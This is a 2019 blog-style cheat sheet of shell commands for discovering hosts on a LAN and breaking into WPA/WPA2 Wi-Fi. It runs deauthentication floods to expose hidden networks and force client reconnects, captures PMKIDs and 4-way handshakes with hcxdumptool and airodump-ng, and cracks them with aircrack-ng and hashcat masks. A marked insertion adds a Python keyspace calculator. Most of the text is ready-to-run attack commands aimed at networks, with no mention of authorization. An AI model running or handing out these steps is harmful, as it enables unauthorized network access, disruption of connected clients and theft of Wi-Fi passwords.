Discovering router devices on the LAN
June 17, 2019

Already inside the LAN
netdiscover

```shell
netdiscover -r 192.168.1.1/24 -PN
```

```shell
# install
sudo apt-get update
sudo apt-get install netdiscover
```
nmap

```shell
# Output is less clear than netdiscover's
# -sn (No port scan): after host discovery, do not go on to a port scan (very time-consuming)
# Use this command to find hosts on the network without attracting much attention.
nmap -sn 192.168.1.0/24
```

```shell
# Can detect the OS version (partial identification; Windows is generally recognised)
# -O (Enable OS detection) Enables OS detection
nmap -v -O 192.168.1.101
# Mint 19.1 is not recognised: Too many fingerprints match this host to give specific OS details.
# With the following command the string pc-linux-gnu shows up in the fingerprint.
nmap -O -sV -T4 -d <target>
```

```shell
# install
sudo apt-get update
sudo apt-get install nmap
```
arp-scan

```shell
arp-scan --interface=eth0 --localnet
```
WLAN

Finding a hidden ESSID

```shell
# Check the wireless interface name, usually wlan0 or wlan0mon
iwconfig
# put the wireless interface into monitor mode
airmon-ng start wlan0mon
# In the dump, find the likely target Wi-Fi; the ESSID column usually shows <length: N>
# Note down the BSSID and CH (channel)
airodump-ng wlan0mon
# Point airodump at the BSSID just found
# e.g. BSSID = BC:F6:85:BF:4F:70, CH = 7
airodump-ng -c 7 --bssid BC:F6:85:BF:4F:70 -w psk wlan0mon
# In a second terminal window, run the following so that already-connected clients reconnect;
# the ESSID then becomes visible (look back at the airodump terminal)
# -0 = attack mode (de-authentication); 30 = the number of deauth packets
# -a = target access point MAC address
aireplay-ng -0 30 -a BC:F6:85:BF:4F:70 wlan0mon
```
Cracking Wi-Fi

Obtaining the PMKID, without the old method (capturing the 4-way handshake)

```shell
# Install the tools
apt install -y hcxdumptool hcxtools hashcat
# Put wlan0 into monitor mode
airmon-ng check kill
airmon-ng start wlan0mon
# Kill the wpa_supplicant for wlan0
wpa_cli terminate wlan0
# Use airodump-ng to sniff nearby networks
airodump-ng --ivs wlan0
# Put the sniffed target BSSID into filter.txt
## Create the filtermode file and enter the target's BSSID
## Target BSSID 84:C9:B2:6A:9E:90 ESSID HonnyP01 Channel 1
## "echo "BSSID">filter.txt"
# (a sudo in front of echo would not apply to the redirection, so plain echo is used)
echo "84C9B26A9E90" > filter.txt
# Run hcxdumptool to collect the target's PMKID; let it run for at least 10 minutes
# If an AP receives the association request packet and supports sending PMKID you will see a message "FOUND PMKID"
hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1
# Use hcxpcaptool to convert the pcapng file for hashcat to process next
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng
# Crack the formatted pcapng with hashcat
./hashcat -m 16800 cap01.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
```
Capturing the 4-way handshake of a Wi-Fi login (.cap file)

```shell
# Check whether the card is in Managed or monitor mode
iwconfig
# Switch from Managed mode to monitor
# This may fail; follow the prompt, you may need to kill some processes and retry with:
# airmon-ng check kill
airmon-ng start wlan0mon
# or possibly airmon-ng start wlan0 (not entirely sure)
# Start scanning nearby Wi-Fi; the scan log is saved to files with the prefix wifis in the current directory
# -M : print manufacturer information
# Find the target Wi-Fi's BSSID in the output, e.g. 78:11:DC:10:4F:66
airodump-ng wlan0 -w wifis -M
# Point airodump at the BSSID just found
# e.g. BSSID = 78:11:DC:10:4F:66, CH = 7
# Find the STATION MAC address in the output, e.g. 6C:88:14:F2:47:8C
airodump-ng -c 7 --bssid 78:11:DC:10:4F:66 -w psk wlan0mon
# [open a second terminal]
# Use aireplay-ng to make the target station drop and reconnect;
# the airodump-ng terminal window will then capture the "WPA handshake"
# Locate the corresponding cap file on disk, then crack it offline with aircrack-ng or hashcat
aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon
# Take the wireless card out of monitor mode
airmon-ng stop wlan0mon
```
Cracking the cap

aircrack-ng

```shell
aircrack-ng -w [wordlist-path] [target-handshake-capture-path]
```

```shell
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
```

-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called "wpa.txt" in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password. The * means wild card in Linux, and since I'm assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

```shell
aircrack-ng -a2 -b 00:14:BF:E0:E8:D5 -w /root/wpa.txt /root/Desktop/*.cap
```
hashcat

```shell
# Convert cap to hccap format (the old format, before hashcat 4.0)
aircrack-ng input.cap -J output.hccap
# -----------
# use cap2hccapx from hashcat-utils to convert .cap files to .hccapx files
# Downloading and Compiling the cap2hccapx Utility
wget https://raw.githubusercontent.com/hashcat/hashcat-utils/master/src/cap2hccapx.c
# or: wget http://stuffjasondoes.com/tools/cap2hccapx.c
gcc -o cap2hccapx cap2hccapx.c
mv cap2hccapx /bin
rm cap2hccapx.c
cap2hccapx capture-01.cap capturefile-01.hccapx
```
Brute force is a bit of a stretch: four GTX 1080 Ti cards manage roughly 10 million attempts per second, so a trillion-scale workload would take many years.
```shell
hashcat -m 2500 -a 3 <hashfile> ?1?1?1?1?1?1?1?1 --increment -1 ?l?d?u
# or
hashcat-cli32.exe -m 0 <hashes.txt> -a 3 ?1?1?1?1?1?1?1?2 -1 ?l?u -2 ?d
# -m hash-type: 2500 = WPA/WPA2 (hccapx); note that 2400 is Cisco-PIX MD5, not WPA2
# -a
#   0 = Straight
#   1 = Combination
#   3 = Brute-force
#   6 = Hybrid dict + mask
#   7 = Hybrid mask + dict
# ?1?1?1?1?1?1?1?1
#   8 times a sign defined in custom charset 1
# --increment
#   Enable increment mode. Otherwise only passwords with length 8 would be checked. Remember ?1?1?1?1?1?1?1?1
#   (also available: --increment-min=NUM --increment-max=NUM)
# -1 ?l?d?u
#   defined charset #1 (used for all positions in this example)
# predefined charsets
# ?l = abcdefghijklmnopqrstuvwxyz
# ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
# ?d = 0123456789
# ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
# ?a = ?l?u?d?s
# ?b = 0x00 - 0xff
# ?l?d?u is the same as
# ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
```
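
To put a number on the "brute force is a stretch" remark and the mask syntax explained above, here is an added Python example (not code from the original post or from hashcat) that computes the keyspace of an `-a 3` mask, including custom charsets and `--increment`, and the days a given guess rate needs to exhaust it. Charset contents follow hashcat's built-ins as listed above (`?b` is omitted); the guess rate of about 1e7/s is the figure the post gives.

```python
"""Keyspace and exhaustion time for a hashcat brute-force mask (-a 3). Added example, not from the post."""
import math

# hashcat's built-in charsets (the predefined charsets listed above; ?b omitted)
BUILTIN = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "?": "?",  # '??' in a mask is a literal question mark
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def tokens(mask):
    """Split a mask into '?x' charset tokens and single literal characters."""
    out, i = [], 0
    while i < len(mask):
        step = 2 if mask[i] == "?" and i + 1 < len(mask) else 1
        out.append(mask[i:i + step])
        i += step
    return out


def expand(spec, custom):
    """Character set described by a spec such as '?l?d?u' or 'ab?d'; custom = {'1': '?l?d?u', ...}."""
    chars = set()
    for tok in tokens(spec):
        if len(tok) == 1:                 # literal character
            chars.add(tok)
        elif tok[1] in custom:            # user-defined charset -1 .. -4
            chars |= expand(custom[tok[1]], {})
        elif tok[1] in BUILTIN:
            chars |= set(BUILTIN[tok[1]])
        else:
            raise ValueError(f"unknown charset {tok}")
    return chars


def keyspace(mask, custom=None, increment=False):
    """Candidate count for the mask; --increment sums lengths 1..len(mask), hashcat's default range."""
    sizes = [len(expand(tok, custom or {})) for tok in tokens(mask)]  # 't!' in '?l?l?l?l?l?lt!' counts 1 each
    if not increment:
        return math.prod(sizes)
    return sum(math.prod(sizes[:n]) for n in range(1, len(sizes) + 1))


def days_to_exhaust(mask, rate, custom=None, increment=False):
    return keyspace(mask, custom, increment) / rate / 86400  # rate = guesses per second
```

For the post's own mask (`?1?1?1?1?1?1?1?1 --increment -1 ?l?d?u`) the incremented keyspace is about 2.2e14 candidates, roughly 257 days at 1e7 guesses/s; the same arithmetic shows why a longer random passphrase pushes exhaustive search out of reach.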
Tips

airodump-ng output is truncated when it exceeds one screen

Reference: https://www.linuxquestions.org/questions/linux-newbie-8/how-to-see-all-lines-in-the-terminal-window-4175457226/

Use the -w parameter to specify a log-file prefix; each run then writes log files into the current directory.